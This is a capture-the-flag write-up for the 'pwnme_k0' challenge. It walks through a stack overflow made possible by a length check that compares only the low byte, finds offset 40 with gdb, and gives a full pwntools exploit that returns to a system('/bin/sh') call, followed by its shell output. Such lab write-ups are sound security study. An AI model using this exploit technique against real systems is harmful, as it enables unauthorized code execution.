三个白帽 (Sangebaimao)

0x00 Preface

This challenge seems to have more than one solution; it is quite an interesting one.

0x01 Program Analysis

mask@mask-virtual-machine:~/sangebaimao$ ./pwnme_k0 
**********************************************
**
*Welcome to sangebaimao,Pwnn me and have fun!*
**
**********************************************
Register Account first!
Input your username(max lenth:20):
mask
Input your password(max lenth:20):
abcd
Register Success!!
1.Sh0w Account Infomation!
2.Ed1t Account Inf0mation!
3.QUit sangebaimao:(
>1
Welc0me to sangebaimao!
mask
abcd
1.Sh0w Account Infomation!
2.Ed1t Account Inf0mation!
3.QUit sangebaimao:(
>2
please input new username(max lenth:20):
test
please input new password(max lenth:20):
1234
1.Sh0w Account Infomation!
2.Ed1t Account Inf0mation!
3.QUit sangebaimao:(
>3
byebyeT.T
mask@mask-virtual-machine:~/sangebaimao$

Now that we roughly know what the program does, load it into IDA:

Seeing this, switch back to the disassembly window:

I had not noticed this before either. At the time I thought it looked very much like a stack overflow, but the length is checked here, so how was I supposed to bypass it? Then I read someone else's writeup and realised, damn, the comparison only uses the low byte (al). That makes it easy: the limit is 20 bytes, i.e. 0x14, so if my input length is, say, 256, i.e. 0x100, then al holds 0x00 and the length check is bypassed.
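As an added illustration (not from the original post or the challenge binary), this C snippet models the truncated length check described above next to a full-width check and a store routine that copies only after that check passes; MAX_LEN, the function names and the 20-byte account field are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MAX_LEN 20  /* the 0x14 limit the prompt advertises (assumed field size) */

/* Constructed model of the flawed check seen in the binary: only the low
 * byte of the length (what the `al` comparison sees) is examined, so any
 * length whose low byte is <= 20 passes, e.g. 256 (0x100) or 276 (0x114). */
int truncated_check_accepts(size_t len)
{
    uint8_t low = (uint8_t)len;
    return low <= MAX_LEN;
}

/* Hardened form: compare the full-width length. */
int full_width_check_accepts(size_t len)
{
    return len <= MAX_LEN;
}

/* Safe store into a fixed 20-byte account field: the full-width check runs
 * before any byte is copied, so an oversized input is rejected outright. */
int store_field(char dst[MAX_LEN + 1], const char *src, size_t len)
{
    if (!full_width_check_accepts(len))
        return -1;
    memcpy(dst, src, len);
    dst[len] = '\0';
    return 0;
}

/* Unit-test helper: how many lengths in [from, to] does the truncated
 * check admit that the full-width check rejects? */
size_t count_bypass_lengths(size_t from, size_t to)
{
    size_t n = 0;
    for (size_t len = from; len <= to; len++)
        if (truncated_check_accepts(len) && !full_width_check_accepts(len))
            n++;
    return n;
}
```

Every length from 256 to 276 slips past the truncated check, which is the kind of boundary a unit test for a length-limited field should cover.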

Looking here, the program provides a usable system("/bin/sh") call; after the overflow we simply return to it.

Next, find the overflow offset:

mask@mask-virtual-machine:~/sangebaimao$ gdb ./pwnme_k0 
GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./pwnme_k0...(no debugging symbols found)...done.
gdb-peda$ pattern create 256
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G'
gdb-peda$ r
Starting program: /home/mask/sangebaimao/pwnme_k0
**********************************************
**
*Welcome to sangebaimao,Pwnn me and have fun!*
**
**********************************************
Register Account first!
Input your username(max lenth:20):
test
Input your password(max lenth:20):
123
Register Success!!
1.Sh0w Account Infomation!
2.Ed1t Account Inf0mation!
3.QUit sangebaimao:(
>2
please input new username(max lenth:20):
mask
please input new password(max lenth:20):
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffda60 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"...)
RBX: 0x0
RCX: 0xffffde0a
RDX: 0x4
RSI: 0x7fffffffdcd0 --> 0xffffde0a
RDI: 0x7fffffffdb60 --> 0x7f00ffffde0a
RBP: 0x6141414541412941 ('A)AAEAAa')
RSP: 0x7fffffffda88 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%"...)
RIP: 0x400b06 (ret)
R8 : 0x7ffff7fde740 (0x00007ffff7fde740)
R9 : 0x726f777373617020 (' passwor')
R10: 0x656c2078616d2864 ('d(max le')
R11: 0x7ffff7b8d760 --> 0xfff247a0fff24790
R12: 0x4007b0 (xor ebp,ebp)
R13: 0x7fffffffded0 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x400aff: call 0x400748
0x400b04: nop
0x400b05: leave
=> 0x400b06: ret
0x400b07: push rbp
0x400b08: mov rbp,rsp
0x400b0b: mov edx,0x1a
0x400b10: mov esi,0x4010c3
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffda88 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%"...)
0008| 0x7fffffffda90 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA"...)
0016| 0x7fffffffda98 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G"...)
0024| 0x7fffffffdaa0 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G\n\336\377\377")
0032| 0x7fffffffdaa8 ("IAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G\n\336\377\377")
0040| 0x7fffffffdab0 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G\n\336\377\377")
0048| 0x7fffffffdab8 ("AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G\n\336\377\377")
0056| 0x7fffffffdac0 ("6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%G\n\336\377\377")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000400b06 in ?? ()
gdb-peda$ x/8gx $rsp
0x7fffffffda88: 0x4141464141304141 0x4147414131414162
0x7fffffffda98: 0x4841413241416341 0x4141334141644141
0x7fffffffdaa8: 0x4134414165414149 0x3541416641414a41
0x7fffffffdab8: 0x41416741414b4141 0x416841414c414136
gdb-peda$ pattern offset 0x4141464141304141
4702116732032008513 found at offset: 40

Now write the exploit:

from pwn import *

r = process('./pwnme_k0')

# Register an account first; the contents do not matter here.
r.recvuntil(b'username(max lenth:20): ')
r.sendline(b'mask')
r.recvuntil(b'password(max lenth:20): ')
r.sendline(b'12345')

# Option 2 (edit) reaches the vulnerable password input.
r.recvuntil(b'>')
r.sendline(b'2')
r.recvuntil(b'new username(max lenth:20): ')
r.sendline(b'test')
r.recvuntil(b'new password(max lenth:20): ')

# 40 bytes of padding up to the saved return address, then the address of
# the system("/bin/sh") call (0x4008a6); pad to 256 bytes in total so the
# low byte of the length is 0x00 and the length check passes.
passexp = b'A' * 40 + p64(0x4008a6) + b'B' * 208
r.sendline(passexp)
r.interactive()

Run it:

mask@mask-virtual-machine:~/sangebaimao$ python exp.py 
[+] Starting local process './pwnme_k0': pid 13114
[*] Switching to interactive mode

$ id
uid=1000(mask) gid=1000(mask) 组=1000(mask),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare),999(docker)
$ whoami
mask
$